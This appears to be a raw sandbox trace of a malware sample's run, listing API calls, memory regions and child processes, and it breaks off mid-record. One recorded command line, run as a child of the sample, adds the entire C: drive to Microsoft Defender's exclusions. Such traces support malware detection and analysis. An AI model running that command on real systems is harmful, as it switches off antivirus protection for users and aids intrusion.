returned 0 [0140.731] ReleaseMutex (hMutex=0x284) returned 0 [0140.731] CloseHandle (hObject=0x284) returned 1 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.732] VirtualFree (lpAddress=0x31a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.733] VirtualFree (lpAddress=0x31f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.734] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.734] VirtualFree (lpAddress=0x31d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.735] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.735] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.735] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.735] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.736] WSACleanup () returned 0 [0140.736] ReleaseMutex (hMutex=0x2a8) returned 0 [0140.736] CloseHandle (hObject=0x2a8) returned 1 [0140.736] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.737] WSACleanup () returned 0 [0140.875] ReleaseMutex (hMutex=0x28c) returned 0 [0140.875] CloseHandle (hObject=0x28c) returned 1 [0140.875] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.876] ReleaseMutex (hMutex=0x2ac) returned 0 [0140.876] CloseHandle (hObject=0x2ac) returned 1 [0140.876] ExitProcess (uExitCode=0x0) Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4a85d000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x134c" cmd_line = "powershell Add-MpPreference -ExclusionPath C:\\" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 452 start_va = 0x10000 end_va = 0x11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 453 start_va = 0x20000 end_va = 0x90fff monitored = 0 entry_point = 0x29c00 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 454 start_va = 0xa0000 end_va = 0x409ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 455 start_va = 0x40a0000 end_va = 0x40bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 456 start_va = 0x40c0000 end_va = 0x40d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040c0000" filename = "" Region: id = 457 start_va = 0x40e0000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 458 start_va = 0x4120000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 459 start_va = 0x4160000 end_va = 0x4163fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004160000" filename = "" Region: id = 460 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 461 start_va = 0x4180000 end_va = 0x4181fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 462 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 463 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 464 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 465 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 466 start_va = 0x7fff0000 end_va = 0x7dfdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 467 start_va = 0x7dfdab590000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfdab590000" filename = "" Region: id = 468 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 469 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 484 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 485 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 486 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 487 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 488 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 490 start_va = 0x45a0000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 491 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 492 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 493 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 494 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 678 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 679 start_va = 0x40a0000 end_va = 0x40a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 680 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 681 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 682 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 683 start_va = 0x44c0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 684 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 685 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 686 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 687 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 688 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 689 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 690 start_va = 0x6f870000 end_va = 0x6f887fff monitored = 0 entry_point = 0x6f874820 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 691 start_va = 0x4500000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 692 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 693 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 694 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 695 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 696 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 697 start_va = 0x6f810000 end_va = 0x6f868fff monitored = 1 entry_point = 0x6f820780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 698 start_va = 0x41d0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 699 start_va = 0x45a0000 end_va = 0x45c9fff monitored = 0 entry_point = 0x45a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 700 start_va = 0x4690000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 701 start_va = 0x4790000 end_va = 0x4917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 702 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 703 start_va = 0x40b0000 end_va = 0x40b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040b0000" filename = "" Region: id = 704 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 705 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 706 start_va = 0x41f0000 end_va = 0x41f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 707 start_va = 0x4920000 end_va = 0x4aa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 708 start_va = 0x4ab0000 end_va = 0x5eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 709 start_va = 0x4580000 end_va = 0x4580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 710 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 711 start_va = 0x45b0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 712 start_va = 0x6cca0000 end_va = 0x6cd18fff monitored = 1 entry_point = 0x6ccaf82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 713 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 714 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 715 start_va = 0x6f800000 end_va = 0x6f807fff monitored = 0 entry_point = 0x6f8017b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 716 start_va = 0x6c5e0000 end_va = 0x6cc90fff monitored = 1 entry_point = 0x6c5f5d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 717 start_va = 0x6c4e0000 end_va = 0x6c5d4fff monitored = 0 entry_point = 0x6c534160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 718 start_va = 0x45b0000 end_va = 0x45b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 719 start_va = 0x4610000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 720 start_va = 0x45c0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 721 start_va = 0x45d0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 722 start_va = 0x45e0000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 723 start_va = 0x45f0000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 724 start_va = 0x4600000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 725 start_va = 0x4620000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 726 start_va = 0x4630000 end_va = 0x4630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 727 start_va = 0x4640000 end_va = 0x4640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 728 start_va = 0x5eb0000 end_va = 0x5fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 729 start_va = 0x5fc0000 end_va = 0x616ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 730 start_va = 0x4650000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 731 start_va = 0x5eb0000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 732 start_va = 0x5fb0000 end_va = 0x5fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 733 start_va = 0x5ef0000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ef0000" filename = "" Region: id = 734 start_va = 0x6170000 end_va = 0x816ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006170000" filename = "" Region: id = 735 start_va = 0x5ef0000 end_va = 0x5f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ef0000" filename = "" Region: id = 736 start_va = 0x5f10000 end_va = 0x5f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 737 start_va = 0x5f50000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 738 start_va = 0x8170000 end_va = 0x84a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 739 start_va = 0x6a6e0000 end_va = 0x6b907fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 740 start_va = 0x84b0000 end_va = 0x867ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084b0000" filename = "" Region: id = 742 start_va = 0x5f90000 end_va = 0x5f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f90000" filename = "" Region: id = 789 start_va = 0x69d30000 end_va = 0x6a6dbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 790 start_va = 0x6bd30000 end_va = 0x6c441fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 791 start_va = 0x6bca0000 end_va = 0x6bd2afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\microsoft.powershell.consolehost.ni.dll") Region: id = 792 start_va = 0x70410000 end_va = 0x70422fff monitored = 0 entry_point = 0x70419950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 793 start_va = 0x703e0000 end_va = 0x7040efff monitored = 0 entry_point = 0x703f95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 794 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Thread: id = 4 os_tid = 0xb4c [0163.539] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0163.544] RoInitialize () returned 0x1 [0163.544] RoUninitialize () returned 0x0 [0164.326] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0164.328] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a Thread: id = 11 os_tid = 0x46c Thread: id = 12 os_tid = 0x12ec Thread: id = 13 os_tid = 0x130c Thread: id = 14 os_tid = 0x148 [0163.546] CoGetContextToken (in: pToken=0x5f8fc3c | out: pToken=0x5f8fc3c) returned 0x0 [0163.546] CObjectContext::QueryInterface () returned 0x0 [0163.546] CObjectContext::GetCurrentThreadType () returned 0x0 [0163.546] Release () returned 0x0 [0163.546] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0163.546] RoInitialize () returned 0x1 [0163.546] RoUninitialize () returned 0x0 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4a798000" os_pid = "0xe70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb64" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 506 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 507 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 508 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 509 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 510 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 511 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 512 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 513 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 514 start_va = 0x7ff6880d0000 end_va = 0x7ff6880e0fff monitored = 0 entry_point = 0x7ff6880d16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 515 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 564 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 565 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 566 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 567 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 568 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 569 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 570 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 571 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 572 start_va = 0x880000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 573 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 574 